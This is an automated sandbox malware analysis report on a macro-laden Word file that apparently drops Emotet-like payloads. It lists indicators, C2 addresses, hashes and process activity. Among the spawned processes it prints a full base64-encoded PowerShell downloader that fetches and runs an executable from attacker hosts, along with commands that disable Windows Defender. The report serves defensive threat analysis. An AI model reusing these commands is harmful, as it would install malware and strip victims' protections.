Enc_message_859897272.doc
This report is generated from a file or URL submitted to this webservice on February 25th 2019 19:32:24 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access
- Contains a remote desktop related string
- Spyware
- POSTs files to a webserver
- Persistence
- Spawns a lot of processes
- Fingerprint
- Tries to identify its external IP address
- Evasive
- Detected document macro trying to fingerprint/evade the analysis environment
- Spreading
- Opens the MountPointManager (often used to detect additional infection locations)
- Network Behavior
- Contacts 4 domains and 11 hosts. View all details
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 26
-
Environment Awareness
-
Detected document macro trying to fingerprint/evade the analysis environment
- details
- Document contains auto-execute macro and tries to obtain external IP/ISP/host information
- source
- Indicator Combinations
- relevance
- 10/10
- ATT&CK ID
- T1063 (Show technique in the MITRE ATT&CK™ matrix)
-
Detected document macro trying to fingerprint/evade the analysis environment
-
External Systems
-
Detected Suricata Alert
- details
-
Detected alert "ET POLICY External IP Lookup api.ipify.org" (SID: 2021997, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET POLICY Possible External IP Lookup ipinfo.io" (SID: 2020716, Rev: 4, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)" (SID: 2021013, Rev: 7, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.) - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 12/54 Antivirus vendors marked sample as malicious (22% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 12/54 Antivirus vendors marked sample as malicious (22% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Suricata Alert
-
General
-
The analysis extracted a file that was identified as malicious
- details
-
11/69 Antivirus vendors marked dropped file "ZPhQTlnvSsgt3fI129V.exe" as malicious (classified as "Malware.Heuristic" with 15% detection rate)
16/70 Antivirus vendors marked dropped file "46.exe" as malicious (classified as "BehavesLike.Emotet" with 22% detection rate)
11/69 Antivirus vendors marked dropped file "ZOhPSkmvRrgs3fH129U.exe" as malicious (classified as "Malware.Heuristic" with 15% detection rate) - source
- Binary File
- relevance
- 10/10
-
The analysis spawned a process that was identified as malicious
- details
-
16/70 Antivirus vendors marked spawned process "46.exe" (PID: 2412) as malicious (classified as "BehavesLike.Emotet" with 22% detection rate)
16/70 Antivirus vendors marked spawned process "46.exe" (PID: 3644) as malicious (classified as "BehavesLike.Emotet" with 22% detection rate)
16/70 Antivirus vendors marked spawned process "limewcs.exe" (PID: 3664) as malicious (classified as "BehavesLike.Emotet" with 22% detection rate)
16/70 Antivirus vendors marked spawned process "limewcs.exe" (PID: 1916) as malicious (classified as "BehavesLike.Emotet" with 22% detection rate)
11/69 Antivirus vendors marked spawned process "ZOhPSkmvRrgs3fH129U.exe" (PID: 3880) as malicious (classified as "Malware.Heuristic" with 15% detection rate)
11/69 Antivirus vendors marked spawned process "ZPhQTlnvSsgt3fI129V.exe" (PID: 1992) as malicious (classified as "Malware.Heuristic" with 15% detection rate) - source
- Monitored Target
- relevance
- 10/10
-
The analysis extracted a file that was identified as malicious
-
Installation/Persistance
-
Writes data to a remote process
- details
-
"powershell.exe" wrote 32 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 1624)
"powershell.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 1624)
"powershell.exe" wrote 8 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 1624)
"powershell.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 1624)
"46.exe" wrote 32 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 204)
"46.exe" wrote 52 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 204)
"46.exe" wrote 4 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 204)
"46.exe" wrote 8 bytes to a remote process "C:\Users\%USERNAME%\46.exe" (Handle: 204)
"limewcs.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\limewcs.exe" (Handle: 204)
"limewcs.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\limewcs.exe" (Handle: 204)
"limewcs.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\limewcs.exe" (Handle: 204)
"limewcs.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\limewcs.exe" (Handle: 204)
"limewcs.exe" wrote 32 bytes to a remote process "%ALLUSERSPROFILE%\ZOhPSkmvRrgs3fH129U.exe" (Handle: 556)
"limewcs.exe" wrote 52 bytes to a remote process "C:\ProgramData\ZOhPSkmvRrgs3fH129U.exe" (Handle: 556)
"limewcs.exe" wrote 4 bytes to a remote process "C:\ProgramData\ZOhPSkmvRrgs3fH129U.exe" (Handle: 556)
"limewcs.exe" wrote 8 bytes to a remote process "C:\ProgramData\ZOhPSkmvRrgs3fH129U.exe" (Handle: 556)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\sc.exe" (Handle: 136)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\sc.exe" (Handle: 136)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\sc.exe" (Handle: 136)
"cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\sc.exe" (Handle: 136)
"cmd.exe" wrote 32 bytes to a remote process "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (Handle: 136)
"cmd.exe" wrote 52 bytes to a remote process "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (Handle: 136)
"cmd.exe" wrote 4 bytes to a remote process "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (Handle: 136)
"cmd.exe" wrote 8 bytes to a remote process "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" (Handle: 136)
"ZPhQTlnvSsgt3fI129V.exe" wrote 32 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 52 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 4 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 8 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 544 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 72 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 22 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 1024 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 103424 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 9216 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 512 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 16 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480)
"ZPhQTlnvSsgt3fI129V.exe" wrote 128 bytes to a remote process "C:\Windows\System32\svchost.exe" (Handle: 480) - source
- API Call
- relevance
- 6/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Writes data to a remote process
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "35.184.61.254": ...
URL: http://35.184.61.254/tg9pzdy (AV positives: 4/66 scanned on 02/25/2019 19:29:47)
URL: http://cabootaxi.com/sendinc/legal/sec/EN_en/02-2019/ (AV positives: 1/69 scanned on 02/25/2019 18:57:52)
URL: http://35.184.61.254/tg9pzdY/ (AV positives: 5/67 scanned on 02/25/2019 17:54:56)
URL: http://35.184.61.254/ (AV positives: 1/69 scanned on 02/25/2019 16:50:17)
File SHA256: f7efe99d17566235f7cc9b4082df95c0ff271fb3bbdc05adf6462416cf3237da (AV positives: 16/67 scanned on 02/25/2019 17:55:00)
File SHA256: 831f367ce1bcabc4afb4144602c8aee7741758c55bd692b46109ed5fb02e5725 (AV positives: 21/69 scanned on 02/25/2019 15:46:08)
File SHA256: dba804f594533cf90100161f83cdff6c43e8a106bbb7207bc8829efc1c91b567 (AV positives: 23/71 scanned on 02/25/2019 14:42:26)
File SHA256: 005221508e9288483c9f817d294e07b8785a37d27358bbcdafacec2a27173c94 (AV positives: 13/71 scanned on 02/25/2019 18:03:23)
File SHA256: a45be4ef0e53658b3e66c9ebfd91cd0d93ae2e45818eabf46ea9c34569fa3f44 (AV positives: 11/72 scanned on 02/25/2019 16:53:19)
Found malicious artifacts related to "52.204.186.102": ...
URL: http://52.204.186.102/pasmkvmb (AV positives: 4/67 scanned on 02/25/2019 19:29:32)
URL: http://52.204.186.102/PASmkvmb/ (AV positives: 8/68 scanned on 02/25/2019 19:07:30)
URL: http://52.204.186.102/PASmkvmb (AV positives: 1/67 scanned on 02/25/2019 14:14:07)
URL: http://52.204.186.102/de_DE/CPFNRNIW0961547 (AV positives: 6/67 scanned on 02/25/2019 00:27:34)
URL: http://52.204.186.102/de_DE/CPFNRNIW0961547/ (AV positives: 6/67 scanned on 02/22/2019 05:57:05)
File SHA256: c5396b0030cb7720618be99dc39402d171bcba706622b92953272d4662e96944 (AV positives: 16/68 scanned on 02/25/2019 16:57:55)
File SHA256: 831f367ce1bcabc4afb4144602c8aee7741758c55bd692b46109ed5fb02e5725 (AV positives: 21/69 scanned on 02/25/2019 16:27:36)
File SHA256: dba804f594533cf90100161f83cdff6c43e8a106bbb7207bc8829efc1c91b567 (AV positives: 23/71 scanned on 02/25/2019 14:42:26)
File SHA256: 98c0ce92e61c133b514b58093e17ffa6df186e40ae7244c9cd6290ec7578b49f (AV positives: 16/60 scanned on 02/22/2019 05:57:09)
File SHA256: 50cae3ad5a58a4c52773cf8252ac8afef2ec987541c3313064295d0535969553 (AV positives: 9/54 scanned on 02/21/2019 14:42:57)
Found malicious artifacts related to "74.59.106.11": ...
URL: http://74.59.106.11:8080/ (AV positives: 2/66 scanned on 02/25/2019 15:39:29)
File SHA256: f7efe99d17566235f7cc9b4082df95c0ff271fb3bbdc05adf6462416cf3237da (AV positives: 16/69 scanned on 02/25/2019 17:09:51)
File SHA256: 005221508e9288483c9f817d294e07b8785a37d27358bbcdafacec2a27173c94 (AV positives: 13/71 scanned on 02/25/2019 18:03:23)
File SHA256: a45be4ef0e53658b3e66c9ebfd91cd0d93ae2e45818eabf46ea9c34569fa3f44 (AV positives: 11/72 scanned on 02/25/2019 16:53:19)
File SHA256: 6af59d0bcad6f54c7243c00cd9826246bbc67f62a9f1cc4d7edac39d89afe536 (AV positives: 11/71 scanned on 02/25/2019 15:54:14)
File SHA256: 82dcb24569b6990269ed9da38d289eb4793d3646f6d01d4a07bf28d839fef56a (AV positives: 11/71 scanned on 02/25/2019 15:41:39)
File SHA256: 3336ba88e2772809657105d1a6d80cda0f3226b30420cb440db87c5ac0b0b9cc (Date: 02/25/2019 15:56:05)
File SHA256: 831f367ce1bcabc4afb4144602c8aee7741758c55bd692b46109ed5fb02e5725 (Date: 02/25/2019 15:56:01)
File SHA256: 15a02fb3df8ead217a7adea0c4c539caa3739d22d8450b533dfbda438cd7c2d8 (Date: 02/25/2019 13:51:53)
File SHA256: dba804f594533cf90100161f83cdff6c43e8a106bbb7207bc8829efc1c91b567 (Date: 02/25/2019 13:51:41)
File SHA256: 75b1408f4b0e580de8ad09f5d37cabc0c49b289bbd3b7553a06d1bf06b212af6 (Date: 02/25/2019 13:51:33)
Found malicious artifacts related to "216.239.32.21": ...
URL: http://perfourjiaty.com/ (AV positives: 5/66 scanned on 02/25/2019 19:25:04)
URL: https://detikdotinfo.com/2015/12/cara-mudah-root-samsung-galaxy-v-plus.html (AV positives: 2/66 scanned on 02/25/2019 19:08:16)
URL: https://tutorapk.com/2018/04/bisnis-jasa-aktivasi-akun-smule-ke-vip_58.html (AV positives: 1/66 scanned on 02/25/2019 18:59:18)
URL: https://myexternalip.com/RAW (AV positives: 2/69 scanned on 02/25/2019 18:57:14)
URL: https://truyenngan.info/2018/11/chiec-xe-bus-ke-tiep.html (AV positives: 5/67 scanned on 02/25/2019 18:49:58)
File SHA256: 08142330655deb1526dcc56795c92eb5c13012f75b599d5ac68db4027953ed80 (AV positives: 1/56 scanned on 02/25/2019 10:39:57)
File SHA256: 626c48fc485f11caacc6e139636d7632d2ff529fe402d5f04f5a088a26849d85 (AV positives: 21/54 scanned on 02/25/2019 04:43:38)
File SHA256: 2ee63e19414fa3bc2799bb632e116ebe8fb8a298107d2e5f5cfae25704f4e620 (AV positives: 46/70 scanned on 02/25/2019 18:35:17)
File SHA256: e6d1c7c4f819ecf2ca28f891a7b12860df0ad55765b3087b41dff7586e900d71 (AV positives: 42/65 scanned on 02/25/2019 11:38:43)
File SHA256: 58dcd2107a0c0819e9d9b467a088f69ebffa6857e82998a01c5860a2ddf19e99 (AV positives: 22/67 scanned on 02/25/2019 06:54:38)
File SHA256: bd2bf858a859d2c267ee5c73ffc444fdfbbc61b853adc472d854dd7933461c66 (Date: 02/22/2019 23:46:03)
File SHA256: bf0ee7699d9e7822c1affa07445e6585bb701a9052931839e081898cb1df2152 (Date: 02/22/2019 01:27:42)
File SHA256: a2066d28cdfb396f9c5bff6798ca416da09b889b32948596ac9cdb25ed8a6317 (Date: 02/22/2019 01:26:16)
File SHA256: f1b439f19126201afcf5ada6846995a57df7fcf6fa57b25c326f73fd297f7023 (Date: 02/20/2019 20:07:08)
File SHA256: 1800f0465d02507cf67d9f59e44a7084bbaf6fcb090cc957b76a14a68e7dc32b (Date: 02/20/2019 20:01:08)
Found malicious artifacts related to "107.22.215.20": ...
URL: http://api.ipify.org/ (AV positives: 1/66 scanned on 02/21/2019 16:00:10)
URL: http://api.ipify.org:443/ (AV positives: 1/69 scanned on 02/20/2019 09:57:24)
URL: http://api.ipify.org/?format=jsonp&callback=jQuery1112024484568499775033_1550467753745&_=1550467753746 (AV positives: 1/69 scanned on 02/20/2019 06:48:06)
URL: http://nagano-19599.herokussl.com/ (AV positives: 1/66 scanned on 02/19/2019 06:26:44)
URL: https://api.ipify.org/ (AV positives: 1/69 scanned on 02/15/2019 09:46:59)
File SHA256: a38acf2c017baa93f7a9768063518daf88268e95a2fd5e9e554408aaee181c88 (AV positives: 48/66 scanned on 02/24/2019 01:10:17)
File SHA256: 114cf7a928bb7d0760217d5b5bb16a15822178778bc236918099935a3c779711 (Date: 02/24/2019 00:58:48)
File SHA256: 1fb28bb210e1763ee70a54677d214c91c9626b8d9d5d646dc08a715e40d68805 (AV positives: 21/65 scanned on 02/23/2019 01:14:42)
File SHA256: 7f52b836ccf785e1784f654fe5ed74a19bdb6c4609e41c039f2c0759de29e54b (AV positives: 26/69 scanned on 02/23/2019 13:01:07)
File SHA256: 7029b55362872e68e09c062affcefa15b26103c5ee27fb21580042e01ccd8165 (Date: 02/23/2019 05:40:11)
File SHA256: ba17c23a584cc42571ccd6bcef85cb74093e4f0638751a1055d3d810fe8370f5 (Date: 02/23/2019 01:07:14)
File SHA256: eb5701e4d7980cb83d33409ce2f51224e9b6c88c68b2abcc9dfb3b747294d66e (AV positives: 49/70 scanned on 02/22/2019 18:17:00)
File SHA256: 1bea03422e915138deb1467d90fe7f0847f023bf57bf1260e4bba6f3e640cd66 (AV positives: 20/69 scanned on 02/21/2019 06:18:04)
File SHA256: e87a81407840642482195f5de7790d3f90257ba4d798aed527bd3e7ba1cb0be2 (Date: 02/15/2019 02:24:05)
File SHA256: cd98a3ebe16fb1489c4e93950dd1b8c5e3e304f66c03f0a9d15951fdbbb57332 (Date: 02/15/2019 00:46:19)
Found malicious artifacts related to "195.123.245.16": ...
URL: http://195.123.245.16/ (AV positives: 4/67 scanned on 02/12/2019 10:37:25)
URL: http://195.123.245.16/search/irsrv.exe (AV positives: 11/67 scanned on 02/08/2019 10:32:39)
URL: http://195.123.245.16/index/index.php (AV positives: 2/66 scanned on 01/14/2019 01:20:36)
File SHA256: 0a88572f98aec04db9bd5fdecef2dfae6297943f (Date: 02/25/2019 16:39:17)
File SHA256: 3b6de2755f17bdfbb9100268ae98c481e4a41ea0d488b304ad99af179d1412cb (Date: 02/25/2019 16:39:17)
File SHA256: b475abca1113f804dd0a2592c28cce16 (Date: 02/25/2019 16:39:17)
File SHA256: 0f2529972e59d3860caa2fa59272e81414b3821e31c78fe6759931acf9757639 (AV positives: 49/70 scanned on 02/08/2019 10:32:44)
File SHA256: 01ac3c269a78c6b109f71c6a02a541bfe397e9660dce3bb7f3bac3130842c4cb (AV positives: 45/71 scanned on 01/25/2019 04:38:31)
File SHA256: a7bd27f950b89431b93cf85666c55fdca875fe3f80741c123c765e7e5d2109a7 (Date: 01/24/2019 02:04:42)
File SHA256: e95d16ab50200283a50501129b6ca1046504a065c1ca64d99843f7aee4e8b376 (AV positives: 48/70 scanned on 01/20/2019 11:03:46)
Found malicious artifacts related to "190.146.112.216": ...
URL: http://190.146.112.216/sat1/LGEB1R07V053_W617601.1310DEFB8D422F0E1F95FDBD2D9A58FE/83/ (AV positives: 8/67 scanned on 02/25/2019 13:59:27)
URL: http://190.146.112.216/sat1/LGEB1R07V053_W617601.1310DEFB8D422F0E1F95FDBD2D9A58FE/60/ (AV positives: 8/67 scanned on 02/25/2019 13:14:23)
URL: http://190.146.112.216/lib417/FMZCKAM001_W617601.589DBF39F403B3D8D70D6AFB9059ACDC/60 (AV positives: 7/67 scanned on 02/25/2019 00:51:53)
URL: http://190.146.112.216/sin12/CONF-2-W7-64S_W617601.E67C1D43F994D753499CBA99AF5723F3/60 (AV positives: 8/67 scanned on 02/25/2019 00:37:15)
URL: http://190.146.112.216/lib420/FMZEMPQ0039_W617601.2785DBCAA125CD6D7E51794633C82D47/83 (AV positives: 9/67 scanned on 02/25/2019 00:35:29)
File SHA256: 8fcb77f2be3ee5848865bb21c503aadd6b9e91265f9aa6b79fd1bb2ae5d502cf (AV positives: 30/72 scanned on 02/13/2019 08:58:35)
File SHA256: 59ef9d793f3f82b1d9bc8f8163e1bb19fb3cb58ed9c4b673798337f7c5196114 (AV positives: 20/71 scanned on 02/09/2019 00:03:41) - source
- Network Traffic
- relevance
- 10/10
-
Tries to identify its external IP address
- details
-
"api.ipify.org"
"ipinfo.io" - source
- Network Traffic
- relevance
- 6/10
-
Malicious artifacts seen in the context of a contacted host
-
System Security
-
Attempts to modify Windows Defender preferences
- details
-
Process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Tries to disable/delete the windows firewall
- details
-
Process "sc.exe" with commandline "sc stop WinDefend" (Show Process)
Process "sc.exe" with commandline "sc delete WinDefend" (Show Process)
Process "sc.exe" with commandline "sc delete WinDefend" (Show Process)
Process "sc.exe" with commandline "sc stop WinDefend" (Show Process) - source
- Monitored Target
- relevance
- 10/10
- ATT&CK ID
- T1089 (Show technique in the MITRE ATT&CK™ matrix)
-
Attempts to modify Windows Defender preferences
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
- ATT&CK ID
- T1137 (Show technique in the MITRE ATT&CK™ matrix)
-
Contains native function calls
- details
-
NtdllDefWindowProc_A@NTDLL.DLL from ZOhPSkmvRrgs3fH129U.exe (PID: 3880) (Show Stream)
NtdllDefWindowProc_A@NTDLL.DLL from ZPhQTlnvSsgt3fI129V.exe (PID: 1992) (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Spawns a lot of processes
- details
-
Spawned process "WINWORD.EXE" with commandline "/n "C:\Enc_message_859897272.doc"" (Show Process)
Spawned process "powershell.exe" with commandline "poweRsHeLl -nop -e JABXADMAXwA1ADQANgAzAF8APQAoACcAaAA4ADYAXwAnACsAJwAwADIANAAyACcAKQA7ACQARwA2AF8AXwAxADEANwA5AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGMAXwAwAF8ANQBfAF8AXwA9ACgAJwBoAHQAdABwADoALwAvACcAKwAnADMANQAuADEAJwArACcAOAA0ACcAKwAnAC4ANgAxAC4AJwArACcAMgAnACsAJwA1ADQAJwArACcALwB0AGcAJwArACcAOQBwACcAKwAnAHoAZABZAEAAJwArACcAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwA1ADIAJwArACcALgAnACsAJwAyADAAJwArACcANAAuADEAOAA2AC4AMQAwADIALwBQAEEAUwBtACcAKwAnAGsAdgBtAGIAJwArACcAQABoAHQAdABwADoALwAvADUANAAuACcAKwAnADEANwAnACsAJwAyAC4AOAAnACsAJwA1ACcAKwAnAC4AJwArACcAMgAyACcAKwAnADEALwBUACcAKwAnAGkAMAAnACsAJwBKAGUASgB1ACcAKwAnADkAJwArACcAQABoAHQAJwArACcAdABwADoALwAvADUAMgAuACcAKwAnADcAMAAnACsAJwAuACcAKwAnADIAMwAnACsAJwA5AC4AMgAyADkALwBiACcAKwAnAGwAbwBnAC8AdwBwAC0AJwArACcAYwAnACsAJwBvAG4AdABlACcAKwAnAG4AdAAvAHUAcABsAG8AJwArACcAYQBkAHMALwAnACsAJwBQAFoAOQA2AFgAJwArACcAaQBiAEUAVQBVAEAAaAB0AHQAcAAnACsAJwA6AC8ALwAyACcAKwAnADIAMgAuADEAMAA2ACcAKwAnAC4AMgAnACsAJwAxACcAKwAnADcALgAzACcAKwAnADcALwAnACsAJwB3AG8AJwArACcAcgAnACsAJwBkAHAAcgBlAHMAJwArACcAcwAvADMASQAnACsAJwAxAGUANQAnACsAJwBKAHgAJwApAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQARQBfAF8AMQA4ADYANwA9ACgAJwBjAF8AJwArACcAXwBfADQANwAnACkAOwAkAG0ANABfAF8ANQBfADIAMAAgAD0AIAAnADQANgAnADsAJABoADEANQA1ADcANAA9ACgAJwBxADQAJwArACcANAA0ADAAXwAnACkAOwAkAEoAMAA2AF8ANgA4ADQAXwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbQA0AF8AXwA1AF8AMgAwACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAVQBfADgANgAxADYAOQAgAGkAbgAgACQAYwBfADAAXwA1AF8AXwBfACkAewB0AHIAeQB7ACQARwA2AF8AXwAxADEANwA5AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAXwA4ADYAMQA2ADkALAAgACQASgAwADYAXwA2ADgANABfACkAOwAkAGwAOAA1AF8AXwBfAD0AKAAnAGgAJwArACcAXwBfACcAKwAnAF8AMAAzACcAKQA7AEkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAEoAMAA2AF8ANgA4ADQAXwApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADQAMAAwADAAMAApACAAewBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEoAMAA2AF8ANgA4ADQAXwA7ACQASQAzADcANAAyAF8AOAA9ACgAJwBMADkAMwAnACsAJwBfACcAKwAnADEAXwBfADUAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHcAXwAzADMAXwAzADQAPQAoACcAUQAyADAAJwArACcAMAAxADAAMQAnACkAOwA=" (Show Process)
Spawned process "46.exe" (Show Process)
Spawned process "46.exe" (Show Process)
Spawned process "limewcs.exe" (Show Process)
Spawned process "limewcs.exe" (Show Process)
Spawned process "ZOhPSkmvRrgs3fH129U.exe" (Show Process)
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Spawned process "cmd.exe" with commandline "/c sc stop WinDefend" (Show Process)
Spawned process "cmd.exe" with commandline "/c sc delete WinDefend" (Show Process)
Spawned process "sc.exe" with commandline "sc stop WinDefend" (Show Process)
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Spawned process "ZPhQTlnvSsgt3fI129V.exe" (Show Process)
Spawned process "sc.exe" with commandline "sc delete WinDefend" (Show Process)
Spawned process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Spawned process "cmd.exe" with commandline "/c sc stop WinDefend" (Show Process)
Spawned process "cmd.exe" with commandline "/c sc delete WinDefend" (Show Process)
Spawned process "cmd.exe" with commandline "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process)
Spawned process "sc.exe" with commandline "sc delete WinDefend" (Show Process)
Spawned process "sc.exe" with commandline "sc stop WinDefend" (Show Process)
Spawned process "svchost.exe" (Show Process)
Spawned process "powershell.exe" with commandline "powershell Set-MpPreference -DisableRealtimeMonitoring $true" (Show Process) - source
- Monitored Target
- relevance
- 8/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Hiding 12 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 17
-
Environment Awareness
-
Contains ability to measure performance
- details
-
rdtsc from 46.exe (PID: 2412) (Show Stream)
rdtsc from 46.exe (PID: 3644) (Show Stream)
rdtsc from limewcs.exe (PID: 3664) (Show Stream)
rdtsc from limewcs.exe (PID: 1916) (Show Stream)
rdtsc (Show Stream) - source
- Hybrid Analysis Technology
- relevance
- 10/10
-
Contains ability to measure performance
-
General
-
Opened the service control manager
- details
-
"WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"powershell.exe" called "OpenSCManager" requesting access rights "0X0"
"powershell.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"46.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ALL_ACCESS" (0xf003f)
"limewcs.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ENUMERATE_SERVICE" (0x4)
"limewcs.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ALL_ACCESS" (0xf003f)
"ZOhPSkmvRrgs3fH129U.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ENUMERATE_SERVICE" (0x4)
"sc.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
"ZPhQTlnvSsgt3fI129V.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_ENUMERATE_SERVICE" (0x4)
"svchost.exe" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1) - source
- API Call
- relevance
- 10/10
- ATT&CK ID
- T1035 (Show technique in the MITRE ATT&CK™ matrix)
-
POSTs files to a webserver
- details
-
"POST /del159/HAPUBWS-PC_W617601.C9D9C94C7F21FED123472548990F3FA9/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 190.146.112.216:8082
Content-Length: 154
Cache-Control: no-cache" with no payload - source
- Network Traffic
- relevance
- 5/10
-
Opened the service control manager
-
Installation/Persistance
-
Allocates virtual memory in a remote process
- details
- "powershell.exe" allocated memory in "\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap"
- source
- API Call
- relevance
- 7/10
- ATT&CK ID
- T1055 (Show technique in the MITRE ATT&CK™ matrix)
-
Drops executable files
- details
-
"ZPhQTlnvSsgt3fI129V.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"46.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"ZOhPSkmvRrgs3fH129U.exe" has type "PE32 executable (GUI) Intel 80386 for MS Windows" - source
- Binary File
- relevance
- 10/10
-
Allocates virtual memory in a remote process
-
Network Related
-
Found potential IP address in binary/memory
- details
-
"35.184.61.254"
Heuristic match: "GET /tg9pzdY HTTP/1.1
Host: 35.184.61.254
Connection: Keep-Alive"
Heuristic match: "GET /tg9pzdY/ HTTP/1.1
Host: 35.184.61.254"
"52.204.186.102"
Heuristic match: "GET /PASmkvmb HTTP/1.1
Host: 52.204.186.102
Connection: Keep-Alive"
Heuristic match: "GET /PASmkvmb/ HTTP/1.1
Host: 52.204.186.102"
"74.59.106.11"
"190.146.112.216"
Heuristic match: "162.12.124.64.cbl.abuseat.org"
Heuristic match: "162.12.124.64.zen.spamhaus.org" - source
- File/Memory
- relevance
- 3/10
-
Sends traffic on typical HTTP outbound port, but without HTTP header
- details
-
TCP traffic to 35.184.61.254 on port 80 is sent without HTTP header
TCP traffic to 52.204.186.102 on port 80 is sent without HTTP header
